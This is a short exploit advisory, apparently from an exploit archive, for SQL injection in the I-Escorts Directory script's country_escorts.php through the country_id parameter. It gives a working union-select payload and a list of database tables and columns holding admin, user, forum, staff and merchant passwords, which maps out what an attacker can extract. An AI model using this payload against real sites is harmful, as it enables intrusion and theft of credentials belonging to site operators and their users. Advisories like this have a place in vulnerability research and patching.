id: 10520
date: 12/30/2009
title: I-Escorts Directory (country_escorts.php country_id) SQL Injection
author: R3d-D3v!L
cves: 

================================================================================
I-Escorts Directory (country_escorts.php country_id) SQL Injection Vulnerability
================================================================================

[*] Err0r C0N50L3:
http://server/escorts-directory/country_escorts.php?country_id=(SQL)
 
[~] (SQL):
 
escorts-directory/country_escorts.php?country_id=-1+union+select+@@version
 
[*] MASS TABLE5:
 
escortcms_admin:admin_password:
doc_user:user_password
forums_forums:password
forums_users:password
letter_admin:password
letter_member:password
ost_email:userpass
ost_staff:passwd
directory_admin:admin_password
directory_admin:authorize_merchantpass



#  0day.today [2023-03-26]  #